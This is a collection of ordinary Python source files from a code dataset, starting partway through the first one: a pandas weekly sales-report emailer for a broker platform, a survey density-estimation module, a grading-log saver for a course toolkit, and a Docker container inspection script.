'self_count','call','called','call_50', 'callin',\\\r\n 'called_in','cityarea_count','borough_count','house_num','self_house_num']].astype(int)\r\n\r\n # BD (account manager) summary\r\n bd_count_df = pd.DataFrame(base_data.groupby(['bd_name'])['broker_phone'].agg('count'))\r\n bd_sum_df = pd.DataFrame(base_data.groupby(['bd_name'])['is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in','important','super'].agg('sum'))\r\n bd_avg_df = pd.DataFrame(base_data.groupby(['bd_name'])['cityarea_count','borough_count','house_num','self_house_num'].agg('mean'))\r\n bd_df_a = pd.merge(bd_count_df, bd_sum_df, how='left', left_index=True, right_index=True)\r\n bd_df = pd.merge(bd_df_a, bd_avg_df, how='left', left_index=True, right_index=True)\r\n bd_df['broker_use_per'] = bd_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n bd_df['call_50_per'] = bd_df.apply(lambda x: str(round((float(x['call_50']) / x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n bd_df['call_per'] = bd_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n bd_df['broker_phone'] = bd_df['broker_phone'] / 3.0\r\n bd_df['is_used'] = bd_df['is_used'] / 3.0\r\n bd_df.reset_index(inplace=True)\r\n bd_df = bd_df[[ 'bd_name', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count','self_count', 'call', 'called', 'call_50', 'call_50_per',\\\r\n 'callin', 'called_in','important', 'super', 'cityarea_count', 'borough_count', 'house_num','self_house_num']]\r\n bd_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n bd_df = bd_df.fillna(0)\r\n bd_df[['broker_phone','is_used','call', 'called', 'call_50', 'callin', 'called_in']] = 
bd_df[['broker_phone','is_used','call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n bd_df=bd_df.round({'broker_phone':0,'is_used':0,'cityarea_count':1,'borough_count':1,'house_num':1,'self_house_num':1})\r\n bd_df.columns = [ '服务顾问', '服务人数', '使用精选客源功能人数', '精选客源功能使用率','分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数',\\\r\n '50秒以上客源数', '50秒以上占比','来电总量', '来电总量(接通)','重点推广房源数', '超级推广房源数','人均认领商圈数','人均认领小区数',\\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n # city summary\r\n city_count_df = pd.DataFrame(base_data.groupby(['cyc_str','city_cn'])['broker_phone'].agg('count'))\r\n city_sum_df = pd.DataFrame(base_data.groupby(['cyc_str','city_cn'])[ 'is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in', 'important', 'super'].agg('sum'))\r\n city_avg_df = pd.DataFrame(base_data.groupby(['cyc_str', 'city_cn'])['cityarea_count', 'borough_count', 'house_num','self_house_num'].agg('mean'))\r\n city_df_a = pd.merge(city_count_df, city_sum_df, how='left', left_index=True, right_index=True)\r\n city_df = pd.merge(city_df_a, city_avg_df, how='left', left_index=True, right_index=True)\r\n city_df['broker_use_per'] = city_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n city_df['call_50_per'] = city_df.apply(lambda x: str(round((float(x['call_50']) / x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n city_df['call_per'] = city_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n city_df.reset_index(level=['cyc_str', 'city_cn'], inplace=True)\r\n city_df = city_df[['cyc_str', 'city_cn', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count', 'self_count', 'call','called', 'call_50', 'call_50_per', \\\r\n 'callin', 'called_in', 'important', 'super', 'cityarea_count', 'borough_count', 'house_num','self_house_num']]\r\n #city_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n city_df = city_df.fillna(0)\r\n city_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']] = city_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n city_df = city_df.round({'cityarea_count': 1, 'borough_count': 1, 'house_num': 1, 'self_house_num': 1})\r\n city_df.columns = ['周期', '城市', '付费人数', '使用精选客源功能人数', '精选客源功能使用率', '分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数', \\\r\n '50秒以上客源数', '50秒以上占比', '来电总量', '来电总量(接通)', '重点推广房源数', '超级推广房源数', '人均认领商圈数', '人均认领小区数', \\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n\r\n # company summary\r\n com_count_df = pd.DataFrame(base_data.groupby(['company_name'])['broker_phone'].agg('count'))\r\n com_sum_df = pd.DataFrame(base_data.groupby([ 'company_name'])['is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in', 'important', 'super'].agg('sum'))\r\n com_avg_df = pd.DataFrame(base_data.groupby([ 'company_name'])['cityarea_count', 'borough_count','house_num','self_house_num'].agg( 'mean'))\r\n com_df_a = pd.merge(com_count_df, com_sum_df, how='left', left_index=True, right_index=True)\r\n com_df = pd.merge(com_df_a, com_avg_df, how='left', left_index=True, right_index=True)\r\n com_df['broker_use_per'] = com_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n com_df['call_50_per'] = com_df.apply(lambda x: str(round((float(x['call_50']) / 
x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n com_df['call_per'] = com_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n com_df['broker_phone'] = com_df['broker_phone']/3\r\n com_df['is_used'] = com_df['is_used'] / 3\r\n com_df.reset_index(inplace=True)\r\n com_df = com_df[['company_name', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count', 'self_count', 'call', 'called', 'call_50', 'call_50_per', \\\r\n 'callin', 'called_in', 'important', 'super', 'cityarea_count', 'borough_count','house_num','self_house_num']]\r\n com_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n com_df = com_df.fillna(0)\r\n com_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']] = com_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n com_df = com_df.round({'broker_phone':0,'is_used':0,'cityarea_count': 1, 'borough_count': 1, 'house_num': 1, 'self_house_num': 1})\r\n com_df.columns = [ '公司名称', '付费人数', '使用精选客源功能人数', '精选客源功能使用率', '分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数', \\\r\n '50秒以上客源数', '50秒以上占比', '来电总量', '来电总量(接通)', '重点推广的房源数', '超级推广房源数', '人均认领商圈数', '人均认领小区数', \\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n # broker-level detail\r\n base_data.drop(['logogram', 'is_used'], axis=1, inplace=True)\r\n base_data.columns = ['周期', '城市', '经纪人手机号', '姓名', '公司', '区域', '使用客源功能天数', '实际获取的客源数', '尝试联系数量','拨打数量', '接通数量', '50秒以上', '来电数量', \\\r\n '来电数量(接通)', '认领商圈数', '认领小区数', '云门店房源数', '云门店自发房源数', '重点推广','超级推广','部门', '门店','服务顾问']\r\n\r\n bd_df.to_excel(write, '服务顾问详细数据', index=False)\r\n com_df.to_excel(write, '公司汇总数据', index=False)\r\n base_data.to_excel(write, '经纪人详细数据', index=False)\r\n write.close()\r\n html_text_0 = tools.to_html('城市数据总览-%s' % cyc_str, city_df)\r\n html_text_1 = tools.to_html('bd完成情况%s' % cyc_str, bd_df)\r\n html_text_2 = tools.to_html('各公司数据汇总', com_df)\r\n send_msg = city + '-date@zhugefang.com'\r\n html_text = html_text_0 + html_text_1 + html_text_2\r\n #zhuge_email.sendmail('【%s-二手房日报-%s】' % (city,cyc_str), '%s' % html_text, 'sc-data@zhugefang.com',['liuqiang@zhugefang.com'],[], [file_path])\r\n zhuge_email.sendmail('【%s-二手房周汇总-%s-%s】' % (city, yestoday, before_7_days), '%s' % html_text,'liuqiang@zhuge.com', [send_msg],['liuqiang@zhuge.com','qichangnian@zhuge.com','wangyang@zhuge.com','zhankui@zhuge.com','wujunrong@zhuge.com','liuchunhui@zhuge.com','huangzhicong@zhuge.com'],[file_path])\r\n\r\ncity_write()","sub_path":"report_daily/oldhouse/week_data/a_old_house_week_data.py","file_name":"a_old_house_week_data.py","file_ext":"py","file_size_in_byte":15568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
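The report above builds three groupby summaries and writes each to its own sheet of one workbook before mailing it. A minimal sketch of the multi-sheet `pd.ExcelWriter` pattern (frame contents and sheet names are placeholders):

```python
import pandas as pd

# Placeholder frames standing in for the BD/company/broker summaries above.
summary = pd.DataFrame({'city': ['bj'], 'leads': [120]})
detail = pd.DataFrame({'broker': ['13800000000'], 'calls': [7]})

# One workbook, one sheet per DataFrame; the context manager saves on exit.
with pd.ExcelWriter('report.xlsx') as writer:
    summary.to_excel(writer, sheet_name='summary', index=False)
    detail.to_excel(writer, sheet_name='detail', index=False)
```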
+{"seq_id":"91579868","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_json: true\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.6.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# ### Density Estimation of Subjective Distribution of Income Growth\n#\n# - Following Manski et al.(2009)\n# - Depending on the locations and number of bins, there are three cases \n# - case 1. 3+ intervales with positive probabilities, to be fitted with a generalized beta distribution\n# - case 2. exactly 2 adjacent intervals with positive probabilities, to be fitted with a triangle distribution \n# - case 3. one interval only, to be fitted with a uniform distribution\n\nfrom scipy.stats import gamma\nfrom scipy.stats import beta \nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nimport numpy as np\nimport pandas as pd\n\n\n# ### Case 1. Generalized Beta Distribution\n\n# + {\"code_folding\": [0]}\ndef GeneralizedBetaEst(bin,\n probs,\n rep = 3):\n \"\"\"\n This fits a histogram with positive probabilities in at least 3 bins to a generalized beta distribution.\n Depending on if there is open-ended bin on either side with positive probability, \n the estimator decides to estimate 2 or 4 parameters, respectively. \n \n paramters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarrray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n -------\n moments: ndarray of 2 or 4 \n 2: alpha and beta \n 4: alpha, beta, lb, ub, e.g. lb=0 and ub=1 for a standard beta distribution\n \"\"\"\n # n+1 bins and n probs, both are arrays\n if sum([probs[i] > 0 for i in range(len(bin)-1)])<3:\n print(\"Warning: at least three bins with positive probs are needed\")\n para_est = None\n if sum(probs) != 1:\n print(\"probs need to sum up to 1\")\n para_est = None\n else:\n cdf = np.cumsum(probs)\n pprob = [i for i in range(len(bin)-1) if probs[i]>0]\n lb = bin[min(pprob)]\n print(\"lower bound is \"+str(lb))\n ub = bin[max(pprob)+1]\n print(\"upper bound is \"+str(ub))\n x0_2para = (2,1)\n x0_4para = (2,1,0,1) \n def distance2para(paras2): # if there is no open-ended bin with positive probs \n a,b = paras2\n distance = sum((beta.cdf(bin[1:],a,b,loc=lb,scale=ub-lb)-cdf)**2)\n return distance\n def distance4para(paras4): # if either on the left or right side one open-ended bin is with postive probs\n a,b,lb,ub = paras4\n distance = sum((beta.cdf(bin[1:],a,b,loc=lb,scale=ub-lb)-cdf)**2)\n return distance\n \n ## 4-parameter estimation\n if lb == bin[0] and ub == bin[-1]:\n para_est_holder = np.zeros(4)\n suc_ct = 0\n for time in range(rep):\n para_est_rs = minimize(distance4para,\n x0_4para,\n method='CG',\n options={'disp':True,\n 'gtol': 1e-06})\n para_est = para_est_rs['x']\n print(para_est_rs)\n if not np.isnan(para_est).any():\n suc_ct = suc_ct+1 ## only counts the times of success to divide for avearge \n para_est_holder = para_est_holder + para_est \n para_est = para_est_holder/suc_ct \n \n ## 2-parameter estimation\n else:\n para_est_holder = np.zeros(2)\n suc_ct = 0\n for time in range(rep):\n para_est_rs = minimize(distance2para,\n x0_2para,\n method='CG',\n options={'disp':True,\n 'gtol': 1e-06})\n para_est = para_est_rs['x']\n print(para_est_rs)\n if not np.isnan(para_est).any(): ## if para_est is not null \n suc_ct = suc_ct+1 ## only counts the times of success to 
divide for average \n para_est_holder = para_est_holder + para_est\n para_est = para_est_holder/suc_ct\n return para_est # could be 2 or 4 parameters \n\n\n# + {\"code_folding\": [0]}\ndef GeneralizedBetaStats(a,b,lb,ub):\n \"\"\"\n This function computes the moments of a generalized beta distribution, mean and variance for now. \n \n parameters\n ----------\n a, b, lb, ub: floats\n \n returns\n -------\n dict: 4 keys\n mean, float \n variance, float\n skewness,float\n kurtosis,float\n \"\"\"\n # lb=0 and ub=1 for a standard beta distribution\n \n mean, var, skew, kurt = beta.stats(a, b, loc=lb, scale=ub-lb, moments='mvsk')\n #mean = lb + (ub-lb)*a/(a+b)\n #var = (ub-lb)**2*a*b/((a+b)**2*(a+b+1))\n return {\"mean\": mean,\n \"variance\":var,\n \"skewness\":skew,\n \"kurtosis\":kurt}\n\n\n# -\n\n# ### Case 2. Isosceles Triangle distribution\n#\n# Two adjacent intervals $[a,b]$,$[b,c]$ are assigned probs $\\alpha$ and $1-\\alpha$, respectively. In the case of $\\alpha<1/2$, we need to solve parameter $t$ such that $[b-t,c]$ is the interval of the distribution. Denote the height of the triangle distribution $h$. Then the following two restrictions need to be satisfied\n#\n# \\begin{eqnarray}\n# \\frac{t^2}{t+c-b} h = \\alpha \\\\\n# (t+(c-b))h = 2\n# \\end{eqnarray}\n#\n# The two equations can be solved for $t$ and $h$\n#\n# $$\\frac{t^2}{(t+c-b)^2}=\\alpha$$\n#\n# $$t^2 = \\alpha t^2 + 2\\alpha t(c-b) + \\alpha(c-b)^2$$\n#\n# $$(1-\\alpha) t^2 - 2\\alpha(c-b) t - \\alpha(c-b)^2=0$$\n#\n# $$\\implies t =\\frac{2\\alpha(c-b)+\\sqrt{4\\alpha^2(c-b)^2+4(1-\\alpha)\\alpha(c-b)^2}}{2(1-\\alpha)} = \\frac{\\alpha(c-b)+(c-b)\\sqrt{\\alpha}}{(1-\\alpha)}$$\n#\n# $$\\implies h = \\frac{2}{t+c-b}$$\n#\n\n# + {\"code_folding\": [0]}\ndef TriangleEst(bin,probs):\n \"\"\"\n The function fits histograms with exactly two adjacent \n bins of positive probabilities to an isosceles triangular distribution.\n It generates the bounds of the isosceles triangle distribution. 
\n \n parameters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n --------\n dict: 3 keys\n lb: float, left bound \n ub: float, right bound\n h: float, height of the triangle\n \n \"\"\"\n if sum([probs[i]>0 for i in range(len(bin)-1)])==2:\n print(\"There are two bins with positive probs\")\n pprobadj = [i for i in range(1,len(bin)-3) if probs[i]>0 and probs[i+1]>0] # from 1 to -3 because excluding the open-ended on the left/right\n if sum(pprobadj)>0:\n print('The two intervals are adjacent and not open-ended')\n min_i = min(pprobadj)\n #print(min_i)\n #print(probs[min_i])\n #print(probs[min_i+1])\n #print(pprobadj[0])\n #print(pprobadj[0]+2)\n #print(probs[min_i] > probs[min_i+1])\n #print(bin[pprobadj[0]])\n #print(bin[pprobadj[0]+2])\n if probs[min_i] > probs[min_i+1]:\n alf = probs[min_i+1]\n lb = bin[pprobadj[0]]\n scl = bin[pprobadj[0]+1]-bin[pprobadj[0]]\n t = scl*(alf/(1-alf) +np.sqrt(alf)/(1-alf))\n ub = bin[pprobadj[0]+1]+t \n h = 2/(t+bin[pprobadj[0]+1]-bin[pprobadj[0]])\n if probs[min_i] < probs[min_i+1]:\n alf = probs[min_i]\n ub = bin[pprobadj[0]+2]\n scl = bin[pprobadj[0]+2]-bin[pprobadj[0]+1]\n t = scl*(alf/(1-alf) + np.sqrt(alf)/(1-alf))\n lb = bin[pprobadj[0]+1]-t \n h = 2/(t+bin[pprobadj[0]+2]-bin[pprobadj[0]+1])\n if probs[min_i] == probs[min_i+1]:\n lb=bin[pprobadj[0]] # left edge of the first bin (lb and ub were swapped in the original)\n ub=bin[pprobadj[0]+2]\n h = 2/(ub-lb)\n else:\n lb = np.nan\n ub = np.nan\n h = np.nan\n print('Warning: the two intervals are not adjacent or are open-ended')\n return {'lb':lb,'ub':ub,\"height\":h}\n\n\n# -\n\n# #### pdf of a triangle distribution\n#\n# \\begin{eqnarray}\n# f(x)= & 1/2(x-lb) \\frac{x-lb}{(ub+lb)/2}h \\quad \\text{if } x <(lb+ub)/2 \\\\\n# & = 1/2(ub-x) \\frac{ub-x}{(ub+lb)/2}h \\quad \\text{if } x \\geq(lb+ub)/2\n# \\end{eqnarray}\n#\n# \\begin{eqnarray}\n# & Var(x) & = \\int^{ub}_{lb} (x-(lb+ub)/2)^2 f(x) dx \\\\\n# & & = 2 \\int^{(ub+lb)/2}_{lb} (x-(lb+ub)/2)^2 (x-lb) \\frac{x-lb}{(ub+lb)/2}h dx\n# \\end{eqnarray}\n#\n#\n\n# + {\"code_folding\": [0]}\ndef TriangleStats(lb,ub):\n \"\"\"\n parameters\n ----------\n lb and ub: float, left and right bounds of the triangle distribution\n \n returns\n -------\n dict: 2 keys for now\n mean: estimated mean\n variance: estimated variance\n \"\"\"\n \n mean = (lb+ub)/2\n var = (lb**2+ub**2+(lb+ub)**2/4-lb*(lb+ub)/2-ub*(lb+ub)/2-lb*ub)/18\n skew = 0\n kurt = -3/5\n return {\"mean\":mean,\n \"variance\":var,\n 'skewness':skew,\n 'kurtosis':kurt}\n\n\n# -\n\n# ### Case 3. Uniform Distribution\n\n# + {\"code_folding\": [0]}\ndef UniformEst(bin,probs):\n \"\"\"\n This function fits a histogram with only one bin of positive probability to a uniform distribution.\n \n parameters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n --------\n dict: 2 keys\n lb and ub, float. 
the left and right bounds of the uniform distribution\n \"\"\"\n pprob=[i for i in range(len(bin)-1) if probs[i]>0]\n if len(pprob)==1:\n if pprob[0]!=0 and pprob[0]!=len(bin)-2: # exclude the open-ended first and last bins\n lb = bin[pprob[0]]\n ub = bin[pprob[0]+1]\n else:\n lb = np.nan\n ub = np.nan\n else:\n lb = np.nan\n ub = np.nan\n return {\"lb\":lb,\"ub\":ub}\n\n\n# + {\"code_folding\": [0]}\ndef UniformStats(lb,ub):\n \"\"\"\n The function computes the moments of a uniform distribution.\n \n parameters\n ----------\n lb and ub, floats, left and right bounds of uniform distribution\n \n returns\n --------\n dict: 2 keys for now\n mean: estimated mean\n variance: estimated variance \n \"\"\"\n \n if not np.isnan(lb) and not np.isnan(ub):\n mean = (lb+ub)/2\n var = (ub-lb)**2/12\n skew = 0\n kurt = -5/6\n else:\n mean = np.nan\n var = np.nan\n skew = np.nan\n kurt = np.nan\n return {\"mean\":mean,\n \"variance\":var,\n \"skewness\":skew,\n \"kurtosis\":kurt}\n\n\n# -\n\n# ### Test using made-up data\n\n# + {\"code_folding\": []}\n## test 1: GenBeta Dist\n#sim_bins= np.array([0,0.2,0.32,0.5,1,1.3])\n#sim_probs=np.array([0,0.2,0.5,0.3,0])\n#sim_para = GeneralizedBetaEst(sim_bins,sim_probs)\n#GeneralizedBetaStats(sim_para[0],sim_para[1],0,1)\n\n# + {\"code_folding\": []}\n## test 2: Triangle Dist\n#sim_bins2 = np.array([0,0.2,0.32,0.5,1,1.2])\n#sim_probs2=np.array([0.2,0,0.8,0,0])\n#TriangleEst(sim_bins2,sim_probs2)\n\n# + {\"code_folding\": []}\n## test 3: Uniform Dist\n\n#sim_bins3 = np.array([0,0.2,0.32,0.5,1,1.2])\n#sim_probs3=np.array([0,0,0,0,1])\n#sim_para3 = UniformEst(sim_bins3,sim_probs3)\n#UniformStats(sim_para3['lb'],sim_para3['ub'])\n# -\n\n# ### Test with simulated data from known distribution \n# - we simulate data from a true beta distribution with known parameters\n# - then we estimate the parameters with our module and see how close it is with the true parameters \n\n# + {\"code_folding\": []}\n## simulate a generalized distribution\n#sim_n=50\n#true_alpha,true_beta,true_loc,true_scale=1.4,2.2,0,1\n#sim_data = beta.rvs(true_alpha,true_beta,loc=true_loc,scale=true_scale,size=sim_n)\n#sim_bins2=plt.hist(sim_data)[1]\n#sim_probs2=plt.hist(sim_data)[0]/sim_n\n#sim_est=GeneralizedBetaEst(sim_bins2,sim_probs2)\n#sim_est\n\n# + {\"code_folding\": []}\n## plot the estimated generalized beta versus the histogram of simulated data drawn from a true beta distribution \n#sim_x = np.linspace(true_loc,true_loc+true_scale,sim_n)\n#sim_pdf=beta.pdf(sim_x,sim_est[0],sim_est[1],loc=true_loc,scale=true_scale)\n#plt.plot(sim_x,sim_pdf,label='Estimated pdf')\n#plt.hist(sim_data,density=True,label='Dist of Simulated Data')\n#plt.legend(loc=0)\n\n# + {\"code_folding\": []}\n## This is the synthesized density estimation function\ndef SynDensityStat(bin,\n probs):\n \"\"\"\n Synthesized density estimate module:\n It first detects the shape of histograms\n Then accordingly invokes the distribution-specific tool.\n \n parameters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n -------\n moments: dict with 4 keys (more to be added in future)\n mean: empty or float, estimated mean \n variance: empty or float, estimated variance \n skewness: empty or float, estimated skewness \n kurtosis: empty or float, estimated kurtosis\n \n \"\"\"\n if sum(probs)==1:\n print(\"probs sum up to 1\")\n ## Beta distributions \n if sum([probs[i]>0 for i in range(len(bin)-1)])>=3:\n print(\"at 
least three bins with positive probs\")\n para_est=GeneralizedBetaEst(bin,probs)\n if len(para_est)==4:\n print('4 parameters')\n return GeneralizedBetaStats(para_est[0],para_est[1],para_est[2],para_est[3])\n if len(para_est)==2:\n print('2 parameters')\n return GeneralizedBetaStats(para_est[0],para_est[1],0,1)\n ## Triangle distributions\n if sum([probs[i]>0 for i in range(len(bin)-1)])==2:\n #print(\"There are two bins with positive probs\")\n pprobadj = [i for i in range(1,len(bin)-3) if probs[i]>0 and probs[i+1]>0] # from 1 to -3 bcz excluding the open-ended on the left/right\n if sum(pprobadj)>0:\n #print('The two intervals are adjacent and not open-ended')\n para_est=TriangleEst(bin,probs)\n return TriangleStats(para_est['lb'],para_est['ub'])\n if sum([probs[i]>0 for i in range(len(bin)-1)])==1:\n print('Only one interval with positive probs')\n para_est= UniformEst(bin,probs)\n print(para_est)\n return UniformStats(para_est['lb'],para_est['ub'])\n else:\n return {\"mean\":None,\n \"variance\":None,\n \"skewness\":None,\n \"kurtosis\":None}\n else:\n return {\"mean\":np.nan,\n \"variance\":np.nan,\n \"skewness\":np.nan,\n \"kurtosis\":np.nan}\n\n# + {\"code_folding\": []}\n## testing the synthesized estimator function using an arbitrary example created above\n#SynDensityStat(sim_bins3,sim_probs3)['mean']\n","sub_path":"WorkingFolder/PythonCode/DensityEst.py","file_name":"DensityEst.py","file_ext":"py","file_size_in_byte":15507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
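Assuming the module above is saved as `DensityEst.py` on the import path, the synthesized estimator can be exercised like the commented test cells; this usage sketch is not part of the original file:

```python
import numpy as np
from DensityEst import SynDensityStat  # assumes the file above is importable

bins = np.array([0, 0.2, 0.32, 0.5, 1.0, 1.3])   # n+1 bin edges
probs = np.array([0.0, 0.2, 0.5, 0.3, 0.0])      # n probabilities summing to 1
stats = SynDensityStat(bins, probs)               # 3 positive bins -> beta case
print(stats['mean'], stats['variance'])
```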
+{"seq_id":"561069733","text":"import os\nimport logging\n\nfrom cs251tk.formatters import format_collected_data, markdown, gist\nfrom .gist import post_gist\nfrom .tabulate import asciiify\n\n\ndef record_recording_to_disk(results, file_identifier):\n results = sorted(results, key=lambda file: file['student'])\n results = [file['content'] for file in results]\n output = '\\n'.join(results)\n try:\n os.makedirs('logs', exist_ok=True)\n with open('logs/log-{}.md'.format(file_identifier), 'w', encoding='utf-8') as outfile:\n outfile.write(output)\n except Exception as err:\n logging.warning('error! could not write recording:', err)\n\n\ndef send_recording_to_gist(table, results, assignment):\n \"\"\"Publish a table/result pair to a private gist\"\"\"\n\n # the \"-\" at the front is so that github sees it first and names the gist\n # after the homework\n table_filename = '-cs251 report %s table.txt' % assignment\n files = {\n table_filename: {'content': table},\n }\n\n for file in results:\n filename = file['student'] + '.' + file['type']\n files[filename] = {\n 'content': file['content'].strip()\n }\n\n return post_gist('log for ' + assignment, files)\n\n\ndef save_recordings(records, debug=False):\n \"\"\"Take the list of recordings, group by assignment, then save to disk\"\"\"\n\n results = format_collected_data(records,\n group_by='assignment',\n formatter=markdown,\n debug=debug)\n\n for assignment, content in results.items():\n logging.debug(\"Saving recording for {}\".format(assignment))\n record_recording_to_disk(content, assignment)\n\n\ndef gist_recordings(records, table, debug=False):\n \"\"\"Take the list of recordings, group by assignment, then post to a private gist\"\"\"\n\n results = format_collected_data(records,\n group_by='assignment',\n formatter=gist,\n debug=debug)\n\n for assignment, content in results.items():\n logging.debug(\"Saving recording for {}\".format(assignment))\n\n # clean up the table and make it plain ascii\n table = asciiify(table)\n url = send_recording_to_gist(table, content, assignment)\n print(assignment, 'results are available at', url)\n","sub_path":"cs251tk/toolkit/save_recordings.py","file_name":"save_recordings.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"586776147","text":"#from __future__ import division\nimport requests_unixsocket\nimport json\nimport os\n\n#def logs(c_id):\n # base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n # url = \"/events\"\n# session = requests_unixsocket.Session()\n# resp=session.get(base + url, stream= True)\n# print(resp.iter_lines())\n\ndef logs(c_id):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/events\"\n session = requests_unixsocket.Session()\n resp=session.get(base + url, stream= True)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n print(resp.content)\n\ndef proc(c_id,stream):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/containers/%s/top?ps_args=%s\" % (c_id,stream)\n session = requests_unixsocket.Session()\n resp=session.get(base+url)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n a=resp.json()\n print(\"%s\" % a[\"Titles\"])\n print(a[\"Processes\"]) \n\ndef ins(c_id,stream):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/containers/%s/stats?stream=%s\" % (c_id,stream)\n session = requests_unixsocket.Session()\n resp=session.get(base+url)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n a=resp.json()\n b=a[\"memory_stats\"][\"usage\"]\n c=a[\"memory_stats\"][\"max_usage\"]\n print(\"At date & time : %s \"% a[\"read\"])\n print(\"Memory usage : %s\"% ((float(b)*100)/float(c)))\n #b=a[cpu_stats][][]\n print(\"CPU_usage in naoseconds : %s\"% a[\"cpu_stats\"][\"cpu_usage\"][\"total_usage\"])\n\nbase = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\nurl = \"/containers/json\"\nsession = requests_unixsocket.Session()\nresp=session.get(base+url) \nprint(\"No. of containers running are : %s \" % sum(1 for i in resp.json()))\nfor item in resp.json():\n #print(resp.content)\n print(\" \")\n a=item[\"Id\"]\n print(\"processId :\")\n os.system(\"sudo docker inspect -f '{{.State.Pid}}' \" + a)\n print(\"Container Id : %s\" % item[\"Id\"])\n print(\"Container name : %s\" % item[\"Names\"][0])\n print(\"Container status : %s\" % item[\"Status\"])\n print(\"Container state : %s\" % item[\"State\"])\n print(\"Container Image Name : %s \" % item[\"Image\"])\n print(\"Container Image ID : %s\" % item[\"ImageID\"])\n print(\"Command inside the container : %s\" % item[\"Command\"])\n print(\"Container NetworkID : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"NetworkID\"])\n print(\"Container MacAddress : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"MacAddress\"])\n print(\"Container Gateway : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"Gateway\"])\n print(\"Container IP Address : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"IPAddress\"])\n ins(a, 0)\n #logs(a)\n proc(a, \"ef\")\n","sub_path":"DockInspect.py","file_name":"DockInspect.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
